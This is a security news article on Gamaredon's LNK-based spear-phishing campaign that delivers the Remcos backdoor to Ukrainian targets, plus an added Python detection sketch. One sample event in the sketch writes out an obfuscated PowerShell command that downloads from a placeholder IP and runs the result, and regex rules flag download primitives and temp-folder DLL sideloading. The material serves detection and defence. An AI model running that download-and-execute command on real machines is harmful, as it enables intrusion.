Tuesday, April 1, 2025

Gamaredon Hackers Weaponize LNK Files to Deliver Remcos Backdoor


Cisco Talos has uncovered an ongoing cyber campaign by the Gamaredon threat actor group, targeting Ukrainian users with malicious LNK files to deliver the Remcos backdoor.

Active since at least November 2024, this campaign employs spear-phishing tactics, leveraging themes related to the Ukraine conflict to lure victims into executing the malicious files.

The LNK files, disguised as Office documents, are distributed within ZIP archives and carry filenames referencing troop movements and other war-related topics in Russian or Ukrainian.

The attack begins with the execution of a PowerShell downloader embedded in the LNK file.

This downloader contacts geo-fenced servers located in Russia and Germany to retrieve a second-stage ZIP payload containing the Remcos backdoor.

The downloaded payload uses DLL sideloading to execute the backdoor: a malicious DLL is placed where a legitimate, signed application will load it, so the malicious code runs under the cover of a trusted process. This approach helps the attackers evade traditional detection mechanisms that trust the legitimate application.

Sophisticated Delivery Mechanisms

Gamaredon’s phishing emails likely include either direct attachments of the ZIP files or URLs redirecting victims to download them.

The campaign’s filenames, such as “Coordinates of enemy takeoffs for 8 days” or “Positions of the enemy west and southwest,” suggest a deliberate attempt to exploit sensitive geopolitical themes.

Metadata analysis indicates that only two machines were used to create these malicious shortcut files, consistent with Gamaredon’s operational patterns observed in previous campaigns.

The PowerShell scripts embedded in the LNK files use obfuscation techniques, such as leveraging the Get-Command cmdlet, to evade antivirus detection. Once executed, these scripts download and extract the ZIP payload into the %TEMP% folder.

The payload includes clean binaries that load malicious DLLs, which decrypt and execute the final Remcos backdoor payload.

This backdoor is injected into Explorer.exe and communicates with command-and-control (C2) servers hosted on infrastructure primarily based in Germany and Russia.

Targeted Infrastructure and Indicators of Compromise

The campaign’s C2 servers are hosted by Internet Service Providers such as GTHost and HyperHosting.

Notably, Gamaredon restricts access to these servers by geographic location, so that only victims located in Ukraine can reach them.

Reverse DNS records for some of these servers reveal unique artifacts that have helped researchers identify additional IP addresses associated with this operation.

The Remcos backdoor itself provides attackers with robust capabilities for remote control, including data exfiltration and system manipulation.

Cisco Talos has observed evidence of clean applications like TivoDiag.exe being abused for DLL sideloading during this campaign.
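The delivery chain described in the preceding sections (an LNK file launching an obfuscated PowerShell downloader, a ZIP extracted into %TEMP%, and a clean binary such as TivoDiag.exe loading a malicious DLL from that folder) maps onto two endpoint-telemetry checks. The following is an added detection sketch written for this article; it is not Cisco Talos code and uses no data from the Talos report. The records are constructed, simplified Sysmon-style events (process creation and image load), the Get-Command wildcard pattern is an assumed form of the obfuscation the article mentions, and the DLL name, hostnames and IP address are placeholders.

```python
import re

# Constructed, simplified Sysmon-style records (hypothetical; not Talos telemetry).
# id 1 = process creation, id 7 = image load. Paths, hosts and IPs are placeholders.
SAMPLE_EVENTS = [
    # An LNK double-clicked in Explorer spawns a PowerShell downloader that hides
    # "Invoke-Expression" behind a Get-Command wildcard and unpacks into %TEMP%.
    {"id": 1, "host": "ws01", "pid": 4012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": (r'powershell.exe -w hidden -c "&(Get-Command *voke-*pression)'
                 r"((New-Object Net.WebClient).DownloadString('http://192.0.2.10/x'));"
                 r'Expand-Archive $env:TEMP\p.zip $env:TEMP"')},
    # Benign administrative PowerShell from a console: no download primitive.
    {"id": 1, "host": "ws01", "pid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell.exe -c "Get-Service | Where-Object Status -eq Running"'},
    # A clean binary running from %TEMP% loads an unsigned DLL sitting beside it.
    {"id": 7, "host": "ws01", "pid": 4200,
     "image": r"C:\Users\u\AppData\Local\Temp\x\TivoDiag.exe",
     "image_loaded": r"C:\Users\u\AppData\Local\Temp\x\PLACEHOLDER_sideload.dll",
     "signed": False},
    # The same process loading a signed system DLL is normal.
    {"id": 7, "host": "ws01", "pid": 4200,
     "image": r"C:\Users\u\AppData\Local\Temp\x\TivoDiag.exe",
     "image_loaded": r"C:\Windows\System32\kernel32.dll",
     "signed": True},
    # Explorer-spawned PowerShell with a harmless command: parent alone is not enough.
    {"id": 1, "host": "ws02", "pid": 5000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -c "Get-Date"'},
]

# Get-Command (or its alias gcm) resolving a cmdlet through wildcards, so the
# script never spells out the cmdlet name. Assumed form of the obfuscation.
GET_COMMAND_WILDCARD = re.compile(r"(?:Get-Command|\bgcm)\s+[\w*?-]*[*?][\w*?-]*", re.I)
# Common PowerShell download primitives.
DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
# Paths that resolve to the user's temp folder.
TEMP_PATH = re.compile(r"(?:%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\)", re.I)


def is_lnk_style_downloader(ev: dict) -> bool:
    """Process creation: PowerShell spawned by Explorer (how an LNK launch appears)
    whose command line obfuscates a cmdlet via Get-Command or pulls content from the web."""
    if ev["id"] != 1 or not ev["image"].lower().endswith("powershell.exe"):
        return False
    from_explorer = ev["parent_image"].lower().endswith(r"\explorer.exe")
    cmd = ev["cmdline"]
    suspicious = bool(GET_COMMAND_WILDCARD.search(cmd)) or bool(DOWNLOAD_PRIMITIVE.search(cmd))
    return from_explorer and suspicious


def is_temp_sideload(ev: dict) -> bool:
    """Image load: an unsigned DLL under %TEMP% loaded by an executable that also
    lives under %TEMP%, the shape of the clean-binary-plus-malicious-DLL payload."""
    if ev["id"] != 7 or ev["signed"]:
        return False
    return bool(TEMP_PATH.search(ev["image"])) and bool(TEMP_PATH.search(ev["image_loaded"]))


RULES = {
    "lnk_powershell_downloader": is_lnk_style_downloader,
    "temp_dll_sideload": is_temp_sideload,
}


def scan(events: list) -> list:
    """Return (rule, host, pid, event_index) for every record a rule matches."""
    findings = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                findings.append((name, ev["host"], ev["pid"], idx))
    return findings


def triage(events: list) -> dict:
    """Per host: 'high' when both stages of the chain fire, 'medium' for one."""
    per_host = {}
    for name, host, _pid, _idx in scan(events):
        per_host.setdefault(host, set()).add(name)
    return {h: ("high" if len(names) == len(RULES) else "medium") for h, names in per_host.items()}


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
    print(triage(SAMPLE_EVENTS))
```

Each rule on its own is noisy (Explorer spawns PowerShell for many legitimate shortcuts, and software installers do load DLLs from temp folders), which is why `triage` raises the severity only when the downloader stage and the sideload stage are both seen on the same host. Field names follow the Sysmon events this telemetry would normally come from but are simplified here.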

Gamaredon’s use of advanced techniques such as DLL sideloading, geo-fenced infrastructure, and thematic phishing underscores its persistence in targeting Ukraine amidst ongoing geopolitical tensions.

Organizations are advised to remain vigilant against such threats by implementing robust endpoint protection, email security measures, and network monitoring solutions.

IOCs for this threat can be found in our GitHub repository here.


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
